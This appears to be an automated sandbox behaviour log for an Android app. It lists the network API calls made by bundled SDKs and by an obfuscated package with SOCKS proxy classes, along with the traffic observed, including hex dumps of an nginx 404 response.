Source: com.kwai.player.network.KwaiNetworkMonitorAutoDetect$b;->a:35	API Call: android.net.NetworkInfo.isConnected
Source: com.kwai.player.network.KwaiNetworkMonitorAutoDetect$b;->a:45	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.kwai.player.network.KwaiNetworkMonitorAutoDetect$b;->a:47	API Call: android.net.NetworkInfo.isConnected
Source: com.kwai.player.network.KwaiNetworkMonitorAutoDetect$b;->a:51	API Call: android.net.NetworkInfo.isConnected
Source: com.kwai.player.network.KwaiNetworkMonitorAutoDetect$b;->d:77	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.kwai.player.network.KwaiNetworkMonitorAutoDetect$b;->d:81	API Call: android.net.ConnectivityManager.getNetworkInfo
Source: com.xiaomi.push.ak;->a:9	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.xiaomi.push.ak;->b:252	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.xiaomi.push.ak;->e:268	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.xiaomi.push.ak;->e:269	API Call: android.net.NetworkInfo.isConnected
Source: com.xiaomi.push.ak;->f:272	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.xiaomi.push.ak;->k:295	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.xiaomi.push.ak;->l:301	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.xiaomi.push.bx;->b:165	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.xiaomi.push.gf;->c:76	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.xiaomi.push.service.XMPushService;->d:381	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.xiaomi.push.service.XMPushService;->d:398	API Call: android.net.NetworkInfo.getState
Source: com.xiaomi.push.service.XMPushService;->d:402	API Call: android.net.NetworkInfo.getDetailedState
Source: com.xiaomi.push.service.XMPushService;->d:410	API Call: android.net.NetworkInfo.getState
Source: com.unionpay.UPPayAssistEx;->a:156	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.unionpay.UPPayAssistEx;->a:157	API Call: android.net.NetworkInfo.isAvailable
Source: com.unionpay.UPPayAssistEx;->a:159	API Call: android.net.NetworkInfo.getState
Source: com.alipay.sdk.util.b;->b:21	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.kwai.video.hodor.util.f;->a:3	API Call: android.net.ConnectivityManager.getNetworkInfo
Source: com.kwai.video.hodor.util.f;->c:97	API Call: android.net.NetworkInfo.isConnected
Source: com.unionpay.mobile.android.utils.f;->f:95	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.unionpay.mobile.android.utils.f;->f:97	API Call: android.net.NetworkInfo.isAvailable
Source: com.unionpay.mobile.android.utils.f;->f:99	API Call: android.net.NetworkInfo.getState
Source: com.huawei.hms.utils.NetWorkUtil;->a:2	API Call: android.net.NetworkInfo.isConnected
Source: com.huawei.hms.utils.NetWorkUtil;->a:8	API Call: android.net.ConnectivityManager.getActiveNetworkInfo

Source: com.mtnyrvojt.qtbxtwjnq.models.DownloadTask;->doInBackground:7	API Call: java.net.URL.openConnection (not executed)
Source: com.mtnyrvojt.qtbxtwjnq.models.EncodedResourceDownloadTask;->doInBackground:8	API Call: java.net.URL.openConnection (not executed)
Source: com.unionpay.a.c;->a:15	API Call: java.net.URL.openConnection (not executed)
Source: com.unionpay.a.c;->a:22	API Call: java.net.URL.openConnection (not executed)
Source: com.huawei.hms.framework.network.grs.d.a.a;->a:3	API Call: java.net.URL.openConnection (not executed)
Source: com.huawei.hms.availableupdate.j;->a:33	API Call: java.net.URL.openConnection (not executed)
Source: com.kwai.video.b.a;->a:9	API Call: java.net.URL.openConnection (not executed)
Source: com.kwai.video.ksmediaplayeradapter.b.c;->b:111	API Call: java.net.URL.openConnection (not executed)
Source: com.huawei.updatesdk.a.a.b.b;->a:3	API Call: java.net.URL.openConnection (not executed)
Source: com.huawei.updatesdk.a.a.b.b;->a:5	API Call: java.net.URL.openConnection (not executed)
Source: com.huawei.updatesdk.a.a.b.b;->a:11	API Call: java.net.URL.openConnection (not executed)
Source: com.facebook.react.modules.camera.ImageEditingManager$b;->a:51	API Call: java.net.URL.openConnection (not executed)
Source: com.huawei.updatesdk.b.d.d;->a:19	API Call: java.net.URL.openConnection (not executed)
Source: com.bumptech.glide.load.data.g$a;->a:3	API Call: java.net.URL.openConnection (not executed)
Source: com.kwai.video.wayne.extend.decision.b$1;->run:20	API Call: java.net.URL.openConnection (not executed)
Source: com.huawei.hms.hatool.a0;->a:86	API Call: java.net.URL.openConnection (not executed)
Source: com.kwai.video.ksmediaplayerkit.manifest.f;->run:61	API Call: java.net.URL.openConnection (not executed)
Source: com.unionpay.mobile.android.net.c;->a:15	API Call: java.net.URL.openConnection (not executed)
Source: com.unionpay.mobile.android.net.c;->a:22	API Call: java.net.URL.openConnection (not executed)
Source: com.alipay.sdk.net.a;->a:18	API Call: java.net.URL.openConnection (not executed)
Source: com.alipay.sdk.net.a;->a:20	API Call: java.net.URL.openConnection (not executed)
Source: com.airbnb.lottie.network.c;->e:25	API Call: java.net.URL.openConnection (not executed)
Source: com.huawei.hms.opendevice.d;->a:74	API Call: java.net.URL.openConnection (not executed)
Source: okhttp3.internal.platform.AndroidPlatform;->connectSocket:80	API Call: java.net.Socket.connect (not executed)
Source: okhttp3.internal.platform.Platform;->connectSocket:52	API Call: java.net.Socket.connect (not executed)
Source: com.xiaomi.push.ak;->a:119	API Call: java.net.URL.openConnection (not executed)
Source: com.xiaomi.push.ak;->b:236	API Call: java.net.URL.openConnection (not executed)
Source: com.xiaomi.push.ak;->b:243	API Call: java.net.URL.openConnection (not executed)
Source: com.xiaomi.push.fg;->a:42	API Call: java.net.Socket.connect (not executed)
Source: com.facebook.react.a$1;->run:4	API Call: java.net.URL.openConnection (not executed)
Source: com.xiaomi.push.service.r;->b:47	API Call: java.net.Socket.connect (not executed)
Source: com.xiaomi.push.service.y;->a:25	API Call: java.net.URL.openConnection (not executed)

Source: com.mtnyrvojt.qtbxtwjnq.socks.Socks4Impl;->resolveExternalLocalIP:130	API Call: java.net.InetAddress.getByName (not executed)
Source: com.mtnyrvojt.qtbxtwjnq.socks.Utils;->calcInetAddress:10	API Call: java.net.InetAddress.getByName (not executed)
Source: com.mtnyrvojt.qtbxtwjnq.socks.Socks5Impl;->calcInetAddress:73	API Call: java.net.InetAddress.getByName (not executed)
Source: com.google.gson.internal.bind.TypeAdapters$23;->read:7	API Call: java.net.InetAddress.getByName (not executed)
Source: okhttp3.Dns$Companion$SYSTEM$1;->lookup:6	API Call: java.net.InetAddress.getAllByName (not executed)

Source: unknown	Network traffic detected: HTTP traffic on port 33184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56914
Source: unknown	Network traffic detected: HTTP traffic on port 40806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39584
Source: unknown	Network traffic detected: HTTP traffic on port 56190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60630 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60630
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40806
Source: unknown	Network traffic detected: HTTP traffic on port 52096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46744
Source: unknown	Network traffic detected: HTTP traffic on port 56890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42578 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47454
Source: unknown	Network traffic detected: HTTP traffic on port 51710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33168
Source: unknown	Network traffic detected: HTTP traffic on port 47454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39584 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52096
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42578
Source: unknown	Network traffic detected: HTTP traffic on port 40774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44896

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Sep 2023 12:34:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Fri, 03 Mar 2023 18:07:28 GMTETag: W/"592-5f602d176fbd2"Content-Encoding: gzipData Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 6d 6f d3 30 10 fe be 5f 71 04 81 40 22 71 d3 8e 8d a6 69 a4 d1 6e 62 12 8c 89 15 01 1f bd e4 9a 78 4b ec 60 5f 5f c2 c4 7f c7 4e ba b6 d3 00 f1 01 57 aa 92 7b 79 9e e7 ce 77 89 9f 4c 3f 4e 66 df 2e 4f a1 a0 aa 84 cb cf 6f df 9f 4f c0 f3 19 fb 32 98 30 36 9d 4d e1 eb bb d9 87 f7 10 06 3d b8 22 2d 52 62 ec f4 c2 03 af 20 aa 23 c6 56 ab 55 b0 1a 04 4a e7 6c f6 89 ad 1d 4a e8 d2 36 8f be 69 73 82 8c 32 2f 39 88 5b 92 75 55 4a 33 fe 0d 40 38 1c 0e bb 3c cf 05 45 25 97 f9 d8 43 e9 c1 f6 29 89 0b e4 59 72 00 f6 c4 24 a8 c4 e4 b0 77 08 cf ab 8c 9b 62 04 17 8a e0 4c 2d 64 16 b3 ce d9 05 56 48 1c 1c 9f 8f df 17 62 39 f6 26 4a 12 4a f2 67 4d 8d 1e a4 dd db d8 23 5c 13 73 fc 23 48 0b ae 0d d2 f8 f3 ec cc 7f e3 b1 7d 20 c9 2b 1c 7b 19 9a 54 8b 9a 84 92 7b 08 57 4a eb e6 15 d4 3c 47 90 56 cc dc 89 d9 a6 1b 6a 4a 04 b2 a4 1b ae d4 18 af f3 b9 73 ad b2 06 ee e6 16 cb 37 e2 07 46 e1 61 bd b6 4a 54 a9 74 f4 f4 b8 3d 23 68 dd 73 5e 89 b2 89 b8 16 dc 6a 75 50 3e 2f 45 2e a3 d4 aa 40 3d fa b9 c5 2c c2 07 88 6f 7a 7b 90 c3 e1 c9 f1 c9 d9 08 2a ae 73 21 23 38 b6 4e e8 b9 df 3e 40 1f ee ba 78 78 3a 3d 3d 9a bc 9e 3e d4 00 1b 11 3b 12 e8 b7 24 ad 61 85 22 2f 28 b2 a5 95 d9 08 4a 24 ab ce 37 35 4f 85 cc 23 f0 43 17 78 4f ef 0f 5a fa c1 d0 1a 77 fc 35 dc ad 44 46 45 34 e8 60 1f 17 bb 01 f0 4b 9c 53 c4 17 a4 46 1b 83 6e b9 5b cb 7d 0c a9 3a 82 81 ab 73 c7 90 89 e5 7f e1 d8 21 f2 a8 14 f2 76 d7 b7 c1 e1 eb c1 d1 c9 83 80 a5 30 82 30 fb 6b 0c 4f 49 2c f1 af 21 85 5a a2 fe 43 44 cc da 79 b3 6b c7 ba a5 39 88 dd 84 6d 66 b1 4e 62 bb 13 1a e7 db 4d e4 59 25 64 80 6b 5e d5 25 06 a9 aa 98 97 3c b2 c5 8c 27 31 ab 37 20 45 e8 d6 cf e2 87 f7 86 7e 72 e9 66 7f 6f 11 ad a9 f3 d9 3e ef 66 fd 9c c0 20 56 06 a8 e0 64 ff b0 db 99 46 2d 60 85 da 2e 89 6e ec 88 00 29 d0 c8 d3 02 32 85 a6 dd 28 5c 0b 43 c0 65 53 29 8d af 40 69 7b 35 cd 35 82 20 28 b8 81 9b 85 f5 56 b6 2b 59 b0 e5 fa 66 41 53 2e c1 10 d7 36 35 e7 42 c2 5c ab aa a5 fd 97 2e 14 aa 42 57 b8 63 cb 15 5c f3 f4 d6 29 db a6 de f0 25 ef be 06 d1 b3 7e af b0 02 95 6e 82 5c bd f0 c3 97 5e 52 6b 5c 0a b5 30 6d 85 0e 26 d8 5c 4f db 90 98 75 97 12 b7 1f 9e e4 e0 17 63 2a 81 73 92 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2d3Tmo0_q@"qinbxK`__NW{ywL?Nf.OoO206M="-Rb #VUJlJ6is2/9[uUJ3@8<E%C)Yr$wbL-dVHb9&JJgM#\s#H} +{T{WJ<GVjJs7FaJTt=#hs^juP>/E.@=,oz{*s!#8N>@xx:==>;$a"/(J$75O#CxOZw5DFE4`KSFn[}:s!v00k
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Sep 2023 12:34:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Fri, 03 Mar 2023 18:07:28 GMTETag: W/"592-5f602d176fbd2"Content-Encoding: gzipData Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 6d 6f d3 30 10 fe be 5f 71 04 81 40 22 71 d3 8e 8d a6 69 a4 d1 6e 62 12 8c 89 15 01 1f bd e4 9a 78 4b ec 60 5f 5f c2 c4 7f c7 4e ba b6 d3 00 f1 01 57 aa 92 7b 79 9e e7 ce 77 89 9f 4c 3f 4e 66 df 2e 4f a1 a0 aa 84 cb cf 6f df 9f 4f c0 f3 19 fb 32 98 30 36 9d 4d e1 eb bb d9 87 f7 10 06 3d b8 22 2d 52 62 ec f4 c2 03 af 20 aa 23 c6 56 ab 55 b0 1a 04 4a e7 6c f6 89 ad 1d 4a e8 d2 36 8f be 69 73 82 8c 32 2f 39 88 5b 92 75 55 4a 33 fe 0d 40 38 1c 0e bb 3c cf 05 45 25 97 f9 d8 43 e9 c1 f6 29 89 0b e4 59 72 00 f6 c4 24 a8 c4 e4 b0 77 08 cf ab 8c 9b 62 04 17 8a e0 4c 2d 64 16 b3 ce d9 05 56 48 1c 1c 9f 8f df 17 62 39 f6 26 4a 12 4a f2 67 4d 8d 1e a4 dd db d8 23 5c 13 73 fc 23 48 0b ae 0d d2 f8 f3 ec cc 7f e3 b1 7d 20 c9 2b 1c 7b 19 9a 54 8b 9a 84 92 7b 08 57 4a eb e6 15 d4 3c 47 90 56 cc dc 89 d9 a6 1b 6a 4a 04 b2 a4 1b ae d4 18 af f3 b9 73 ad b2 06 ee e6 16 cb 37 e2 07 46 e1 61 bd b6 4a 54 a9 74 f4 f4 b8 3d 23 68 dd 73 5e 89 b2 89 b8 16 dc 6a 75 50 3e 2f 45 2e a3 d4 aa 40 3d fa b9 c5 2c c2 07 88 6f 7a 7b 90 c3 e1 c9 f1 c9 d9 08 2a ae 73 21 23 38 b6 4e e8 b9 df 3e 40 1f ee ba 78 78 3a 3d 3d 9a bc 9e 3e d4 00 1b 11 3b 12 e8 b7 24 ad 61 85 22 2f 28 b2 a5 95 d9 08 4a 24 ab ce 37 35 4f 85 cc 23 f0 43 17 78 4f ef 0f 5a fa c1 d0 1a 77 fc 35 dc ad 44 46 45 34 e8 60 1f 17 bb 01 f0 4b 9c 53 c4 17 a4 46 1b 83 6e b9 5b cb 7d 0c a9 3a 82 81 ab 73 c7 90 89 e5 7f e1 d8 21 f2 a8 14 f2 76 d7 b7 c1 e1 eb c1 d1 c9 83 80 a5 30 82 30 fb 6b 0c 4f 49 2c f1 af 21 85 5a a2 fe 43 44 cc da 79 b3 6b c7 ba a5 39 88 dd 84 6d 66 b1 4e 62 bb 13 1a e7 db 4d e4 59 25 64 80 6b 5e d5 25 06 a9 aa 98 97 3c b2 c5 8c 27 31 ab 37 20 45 e8 d6 cf e2 87 f7 86 7e 72 e9 66 7f 6f 11 ad a9 f3 d9 3e ef 66 fd 9c c0 20 56 06 a8 e0 64 ff b0 db 99 46 2d 60 85 da 2e 89 6e ec 88 00 29 d0 c8 d3 02 32 85 a6 dd 28 5c 0b 43 c0 65 53 29 8d af 40 69 7b 35 cd 35 82 20 28 b8 81 9b 85 f5 56 b6 2b 59 b0 e5 fa 66 41 53 2e c1 10 d7 36 35 e7 42 c2 5c ab aa a5 fd 97 2e 14 aa 42 57 b8 63 cb 15 5c f3 f4 d6 29 db a6 de f0 25 ef be 06 d1 b3 7e af b0 02 95 6e 82 5c bd f0 c3 97 5e 52 6b 5c 0a b5 30 6d 85 0e 26 d8 5c 4f db 90 98 75 97 12 b7 1f 9e e4 e0 17 63 2a 81 73 92 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2d3Tmo0_q@"qinbxK`__NW{ywL?Nf.OoO206M="-Rb #VUJlJ6is2/9[uUJ3@8<E%C)Yr$wbL-dVHb9&JJgM#\s#H} +{T{WJ<GVjJs7FaJTt=#hs^juP>/E.@=,oz{*s!#8N>@xx:==>;$a"/(J$75O#CxOZw5DFE4`KSFn[}:s!v00k
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Sep 2023 12:35:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Fri, 03 Mar 2023 18:07:28 GMTETag: W/"592-5f602d176fbd2"Content-Encoding: gzipData Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 6d 6f d3 30 10 fe be 5f 71 04 81 40 22 71 d3 8e 8d a6 69 a4 d1 6e 62 12 8c 89 15 01 1f bd e4 9a 78 4b ec 60 5f 5f c2 c4 7f c7 4e ba b6 d3 00 f1 01 57 aa 92 7b 79 9e e7 ce 77 89 9f 4c 3f 4e 66 df 2e 4f a1 a0 aa 84 cb cf 6f df 9f 4f c0 f3 19 fb 32 98 30 36 9d 4d e1 eb bb d9 87 f7 10 06 3d b8 22 2d 52 62 ec f4 c2 03 af 20 aa 23 c6 56 ab 55 b0 1a 04 4a e7 6c f6 89 ad 1d 4a e8 d2 36 8f be 69 73 82 8c 32 2f 39 88 5b 92 75 55 4a 33 fe 0d 40 38 1c 0e bb 3c cf 05 45 25 97 f9 d8 43 e9 c1 f6 29 89 0b e4 59 72 00 f6 c4 24 a8 c4 e4 b0 77 08 cf ab 8c 9b 62 04 17 8a e0 4c 2d 64 16 b3 ce d9 05 56 48 1c 1c 9f 8f df 17 62 39 f6 26 4a 12 4a f2 67 4d 8d 1e a4 dd db d8 23 5c 13 73 fc 23 48 0b ae 0d d2 f8 f3 ec cc 7f e3 b1 7d 20 c9 2b 1c 7b 19 9a 54 8b 9a 84 92 7b 08 57 4a eb e6 15 d4 3c 47 90 56 cc dc 89 d9 a6 1b 6a 4a 04 b2 a4 1b ae d4 18 af f3 b9 73 ad b2 06 ee e6 16 cb 37 e2 07 46 e1 61 bd b6 4a 54 a9 74 f4 f4 b8 3d 23 68 dd 73 5e 89 b2 89 b8 16 dc 6a 75 50 3e 2f 45 2e a3 d4 aa 40 3d fa b9 c5 2c c2 07 88 6f 7a 7b 90 c3 e1 c9 f1 c9 d9 08 2a ae 73 21 23 38 b6 4e e8 b9 df 3e 40 1f ee ba 78 78 3a 3d 3d 9a bc 9e 3e d4 00 1b 11 3b 12 e8 b7 24 ad 61 85 22 2f 28 b2 a5 95 d9 08 4a 24 ab ce 37 35 4f 85 cc 23 f0 43 17 78 4f ef 0f 5a fa c1 d0 1a 77 fc 35 dc ad 44 46 45 34 e8 60 1f 17 bb 01 f0 4b 9c 53 c4 17 a4 46 1b 83 6e b9 5b cb 7d 0c a9 3a 82 81 ab 73 c7 90 89 e5 7f e1 d8 21 f2 a8 14 f2 76 d7 b7 c1 e1 eb c1 d1 c9 83 80 a5 30 82 30 fb 6b 0c 4f 49 2c f1 af 21 85 5a a2 fe 43 44 cc da 79 b3 6b c7 ba a5 39 88 dd 84 6d 66 b1 4e 62 bb 13 1a e7 db 4d e4 59 25 64 80 6b 5e d5 25 06 a9 aa 98 97 3c b2 c5 8c 27 31 ab 37 20 45 e8 d6 cf e2 87 f7 86 7e 72 e9 66 7f 6f 11 ad a9 f3 d9 3e ef 66 fd 9c c0 20 56 06 a8 e0 64 ff b0 db 99 46 2d 60 85 da 2e 89 6e ec 88 00 29 d0 c8 d3 02 32 85 a6 dd 28 5c 0b 43 c0 65 53 29 8d af 40 69 7b 35 cd 35 82 20 28 b8 81 9b 85 f5 56 b6 2b 59 b0 e5 fa 66 41 53 2e c1 10 d7 36 35 e7 42 c2 5c ab aa a5 fd 97 2e 14 aa 42 57 b8 63 cb 15 5c f3 f4 d6 29 db a6 de f0 25 ef be 06 d1 b3 7e af b0 02 95 6e 82 5c bd f0 c3 97 5e 52 6b 5c 0a b5 30 6d 85 0e 26 d8 5c 4f db 90 98 75 97 12 b7 1f 9e e4 e0 17 63 2a 81 73 92 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2d3Tmo0_q@"qinbxK`__NW{ywL?Nf.OoO206M="-Rb #VUJlJ6is2/9[uUJ3@8<E%C)Yr$wbL-dVHb9&JJgM#\s#H} +{T{WJ<GVjJs7FaJTt=#hs^juP>/E.@=,oz{*s!#8N>@xx:==>;$a"/(J$75O#CxOZw5DFE4`KSFn[}:s!v00k
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Sep 2023 12:35:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Fri, 03 Mar 2023 18:07:28 GMTETag: W/"592-5f602d176fbd2"Content-Encoding: gzipData Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 6d 6f d3 30 10 fe be 5f 71 04 81 40 22 71 d3 8e 8d a6 69 a4 d1 6e 62 12 8c 89 15 01 1f bd e4 9a 78 4b ec 60 5f 5f c2 c4 7f c7 4e ba b6 d3 00 f1 01 57 aa 92 7b 79 9e e7 ce 77 89 9f 4c 3f 4e 66 df 2e 4f a1 a0 aa 84 cb cf 6f df 9f 4f c0 f3 19 fb 32 98 30 36 9d 4d e1 eb bb d9 87 f7 10 06 3d b8 22 2d 52 62 ec f4 c2 03 af 20 aa 23 c6 56 ab 55 b0 1a 04 4a e7 6c f6 89 ad 1d 4a e8 d2 36 8f be 69 73 82 8c 32 2f 39 88 5b 92 75 55 4a 33 fe 0d 40 38 1c 0e bb 3c cf 05 45 25 97 f9 d8 43 e9 c1 f6 29 89 0b e4 59 72 00 f6 c4 24 a8 c4 e4 b0 77 08 cf ab 8c 9b 62 04 17 8a e0 4c 2d 64 16 b3 ce d9 05 56 48 1c 1c 9f 8f df 17 62 39 f6 26 4a 12 4a f2 67 4d 8d 1e a4 dd db d8 23 5c 13 73 fc 23 48 0b ae 0d d2 f8 f3 ec cc 7f e3 b1 7d 20 c9 2b 1c 7b 19 9a 54 8b 9a 84 92 7b 08 57 4a eb e6 15 d4 3c 47 90 56 cc dc 89 d9 a6 1b 6a 4a 04 b2 a4 1b ae d4 18 af f3 b9 73 ad b2 06 ee e6 16 cb 37 e2 07 46 e1 61 bd b6 4a 54 a9 74 f4 f4 b8 3d 23 68 dd 73 5e 89 b2 89 b8 16 dc 6a 75 50 3e 2f 45 2e a3 d4 aa 40 3d fa b9 c5 2c c2 07 88 6f 7a 7b 90 c3 e1 c9 f1 c9 d9 08 2a ae 73 21 23 38 b6 4e e8 b9 df 3e 40 1f ee ba 78 78 3a 3d 3d 9a bc 9e 3e d4 00 1b 11 3b 12 e8 b7 24 ad 61 85 22 2f 28 b2 a5 95 d9 08 4a 24 ab ce 37 35 4f 85 cc 23 f0 43 17 78 4f ef 0f 5a fa c1 d0 1a 77 fc 35 dc ad 44 46 45 34 e8 60 1f 17 bb 01 f0 4b 9c 53 c4 17 a4 46 1b 83 6e b9 5b cb 7d 0c a9 3a 82 81 ab 73 c7 90 89 e5 7f e1 d8 21 f2 a8 14 f2 76 d7 b7 c1 e1 eb c1 d1 c9 83 80 a5 30 82 30 fb 6b 0c 4f 49 2c f1 af 21 85 5a a2 fe 43 44 cc da 79 b3 6b c7 ba a5 39 88 dd 84 6d 66 b1 4e 62 bb 13 1a e7 db 4d e4 59 25 64 80 6b 5e d5 25 06 a9 aa 98 97 3c b2 c5 8c 27 31 ab 37 20 45 e8 d6 cf e2 87 f7 86 7e 72 e9 66 7f 6f 11 ad a9 f3 d9 3e ef 66 fd 9c c0 20 56 06 a8 e0 64 ff b0 db 99 46 2d 60 85 da 2e 89 6e ec 88 00 29 d0 c8 d3 02 32 85 a6 dd 28 5c 0b 43 c0 65 53 29 8d af 40 69 7b 35 cd 35 82 20 28 b8 81 9b 85 f5 56 b6 2b 59 b0 e5 fa 66 41 53 2e c1 10 d7 36 35 e7 42 c2 5c ab aa a5 fd 97 2e 14 aa 42 57 b8 63 cb 15 5c f3 f4 d6 29 db a6 de f0 25 ef be 06 d1 b3 7e af b0 02 95 6e 82 5c bd f0 c3 97 5e 52 6b 5c 0a b5 30 6d 85 0e 26 d8 5c 4f db 90 98 75 97 12 b7 1f 9e e4 e0 17 63 2a 81 73 92 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2d3Tmo0_q@"qinbxK`__NW{ywL?Nf.OoO206M="-Rb #VUJlJ6is2/9[uUJ3@8<E%C)Yr$wbL-dVHb9&JJgM#\s#H} +{T{WJ<GVjJs7FaJTt=#hs^juP>/E.@=,oz{*s!#8N>@xx:==>;$a"/(J$75O#CxOZw5DFE4`KSFn[}:s!v00k

Source: com.mtnyrvojt.qtbxtwjnq.models.DownloadTask;->doInBackground:8	API Call: java.net.HttpURLConnection.connect
Source: com.mtnyrvojt.qtbxtwjnq.models.EncodedResourceDownloadTask;->doInBackground:9	API Call: java.net.HttpURLConnection.connect
Source: com.unionpay.a.c;->a:55	API Call: java.net.HttpURLConnection.connect
Source: com.kwai.video.ksmediaplayeradapter.b.c;->b:115	API Call: java.net.HttpURLConnection.connect
Source: com.huawei.hms.framework.network.grs.c.i;->call:16	API Call: javax.net.ssl.HttpsURLConnection.connect
Source: com.huawei.hms.framework.network.grs.c.j;->call:21	API Call: javax.net.ssl.HttpsURLConnection.connect
Source: com.alipay.android.phone.mrpc.core.b;->execute:126	API Call: org.apache.http.client.HttpClient.execute
Source: com.alipay.android.phone.mrpc.core.b;->execute:128	API Call: org.apache.http.client.HttpClient.execute
Source: com.alipay.android.phone.mrpc.core.b;->execute:130	API Call: org.apache.http.client.HttpClient.execute
Source: com.alipay.android.phone.mrpc.core.b;->execute:132	API Call: org.apache.http.client.HttpClient.execute
Source: com.alipay.android.phone.mrpc.core.b;->execute:134	API Call: org.apache.http.client.HttpClient.execute
Source: com.alipay.android.phone.mrpc.core.b;->execute:136	API Call: org.apache.http.client.HttpClient.execute
Source: com.alipay.android.phone.mrpc.core.b;->execute:138	API Call: org.apache.http.client.HttpClient.execute
Source: com.alipay.android.phone.mrpc.core.b;->execute:140	API Call: org.apache.http.client.HttpClient.execute
Source: com.huawei.updatesdk.b.d.c;->a:79	API Call: java.net.HttpURLConnection.connect
Source: com.bumptech.glide.load.data.g;->a:37	API Call: java.net.HttpURLConnection.connect
Source: com.unionpay.mobile.android.net.c;->a:55	API Call: java.net.HttpURLConnection.connect
Source: com.airbnb.lottie.network.c;->e:29	API Call: java.net.HttpURLConnection.connect
Source: com.facebook.react.a$1;->run:6	API Call: java.net.HttpURLConnection.connect
Source: com.xiaomi.push.service.y;->a:32	API Call: java.net.HttpURLConnection.connect

Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.33.170
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.33.170
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.72.110
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.72.110
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.33.170
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.33.170
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.72.110
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.72.110
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.33.170
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.33.170
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.4
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.35
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.35
